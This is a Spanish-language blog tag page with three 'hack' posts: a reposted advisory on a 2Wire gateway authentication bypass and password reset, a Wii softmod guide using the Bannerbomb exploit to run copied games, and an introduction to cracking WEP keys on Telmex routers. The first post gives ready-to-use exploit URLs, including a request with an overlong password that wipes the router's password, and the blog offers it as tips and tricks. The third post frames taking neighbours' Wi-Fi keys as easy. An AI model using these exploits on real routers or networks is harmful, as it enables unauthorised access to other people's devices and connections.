Posts Tagged ‘hack’

« Older Entries

Telmex 2Wire 2701HG-T Gateway Tips y Trucos

Martes, Marzo 2nd, 2010

entrar en el router : http://home/

consola : http://home/mdc

 

este aparato wep es facil de crackear con linux,  en solo unos minutos, busca un cd live como

 

hack 2wire_CD35_AuthBypass_PassReset_esp

2WIRE GATEWAY AUTHENTICATION BYPASS Y PASSWORD RESET (08/04/09)
==============================================================

DESCRIPCION
—————–
Existe una vulnerabilidad de bypass de autenticacion en page=CD35_SETUP_01
que permite poner un nuevo password a pesar de ya tener un password puesto.

Si se introduce un password de mas de 512 caracteres el password se elimina
y la proxima vez que se acceda al modem se pedira que se introduzca un nuevo
password.

VULNERABLE
—————-
2Wire 2071 Gateway
2Wire 1800HW
2Wire 1701HG

Firmware
5.29.51
3.17.5
3.7.1

NO VULNERABLE
——————-
Firmware
5.29.135.5 o superior

DISCLOSURE TIMELINE
————————-
03/27/2009 – 2wire Contactado
respuesta no satisfactoria
07/11/2009 – Envie los detalles completos a 2wire
ninguna respuesta
07/17/2009 – Envie el advisory y video demos a 2wire
subio el ticket a “escalated” pero ninguna respuesta
08/02/2009 – Lo hice publico en Defcon 17

EXPLOIT/POC
—————–
Authentication Bypass – usa esta pagina para poner un nuevo password

http://gateway.2wire.net?xslt?page=CD35_SETUP_01

Video: http://www.hakim.ws/2wire/2wire_CD35_Bypass.ogv

Password Reset – usa la misma pagina pero con un password de > 512 caracteres

http://gateway.2wire.net/xslt?PAGE=CD35_SETUP_01_POST&password1=hkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkhkmhkmhkmhkmhkmhkmhkmhkm&password2=hkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkhkmhkmhkmhkmhkmhkmhkmhkm

Video: http://www.hakim.ws/2wire/2wire_CD35_Reset.ogv

GREETS
————
sdc lightos pcp nitr0us 0xf alt3kx darko DeadSector Etal gwolf h4ckult1m4t3
hackerss hd k00l kaz Kbrown mendozaaaa nahual Napa nediam raza-mexicana
roa octalh Setting sla.ckers thornmaker tr3w vandida vi0let xianur0 Yield

Comunidad Underground de Mexico : https://www.underground.org.mx

h k m
http://www.hakim.ws

 

  • Share/Bookmark

Tags: , , , , , , , ,
Posted in hack | No Comments »

Chip Virtual de Wii, Softmod, Desbloqueo nintendo Wii, Homebrew Wii

Jueves, Junio 18th, 2009

Estos son los pasos para el “Chip Virtual”

compatible en teoria  3.x-4.0, sin necesitar el juego de Zelda, con el

bannerbomb alpha

Yo lo realize con un Wii version 3.3u y los pasos fueron los siguientes:

Una Memoria SD en blanco,
El exploit BannerBoom, ( no se requiere el disco de zelda),

http://bannerbomb.qoid.us/

instalar HackMii, que te instala The HomeBrew Channel, DVDx, y BootMii , que a mi no se me instalo BootMii.

http://bootmii.org/download/

HackMii Installer v0.2
is capable of installing:
* BootMii public beta 2
* The Homebrew Channel 1.0.3
* DVDx

Go download the HackMii installer. Copy installer.elf to the root of the SD card, and rename it to boot.elf.

descargar el HackMii, copia el archivo al la raiz del SD y renombralo a boot.elf

conseguir con NUS Download (NUSD) v1.1a el WAD IOS38-64-v3610.wad

instalar el cIOS Installer cIOS38_rev13b-Installer.zip, instalar en 36

ahora en la SD poner en apps, el Backup Launcher 0.3 beta y listo

Entrar al HomeBrew channel, ejecutar Backup Laucher y correr mis DVDs copia de juegos wii

descargar aplicaciones, emuladores, juegos, homebrew http://www.wiibrew.org

enlaces:

Bannerbomb exploid http://bannerbomb.qoid.us/

HackMii http://bootmii.org/

The HomeBrew Channel http://hbc.hackmii.com/  viene incluido en el HAckMii

  • Share/Bookmark

Tags: , , , , , , , ,
Posted in Software, hack | No Comments »

Hacking de routers INFINITUM (2Wire) en Mexico

Jueves, Febrero 28th, 2008

intro:

Información de como concontrarlas llaves WEP para el Internet inalambrico, el Video dice como Hackear una clave en 10 minutos y info de sitios de otras personas, nada mio.
nota: el problema es que tengas una tarjeta inalambrica que este soportada por los programas que crackean o hackean por wifi, hasta venden tarjetas especiales para eso. Tambien, el software yo me baje un linux live CD llamado BackTrack remote exploid que incluye todos lo programas necesarios.

suerte..

Master.

ingegomez:

ABSTRACT:

Los sistemas de red existentes en México estan manejados en su gran mayoría por Telmex (Telefonos de Mexico), lo cual infiere que tambien los servicios de internet en banda ancha dsl lo esten.

Prodigy Infinitum es el nombre del servicio de internet de banda ancha dsl que ofrece Telmex a sus clientes, a los cuales al contratar les regalan un modem dsl el cual es marca 2Wire y en ocasiones traen interfaz inalambrica para poder dar servicio inalambrico al hogar donde fue contratado. Curiosamente, este tipo de sistemas vienen cifrados unicamente con claves WEP de 10 numeros hexadecimales. Aunado a esto los 2Wire vienen con una potencia de transmision que puede llegar a 1 cuadra de distancia dependiendo de la ubicacion en el hogar que fue instalado, esto representa que cualquier persona con tarjeta de red inalambrica y la clave correcta (ya que es variable en cada aparato la clave) podria enlazarse facilmente. El presente articulo intenta dar una forma rapida y una explicacion sencilla de como obtener la clave en estos aparatos con fines educativos y hacer ver que existe una vulnerabilidad en ese tipo de sistemas.

(más…)

Multimedia

  • Share/Bookmark

Tags: , , , , , , , , , , , ,
Posted in Software, hack | No Comments »

« Older Entries

Bad Behavior has blocked 114 access attempts in the last 7 days.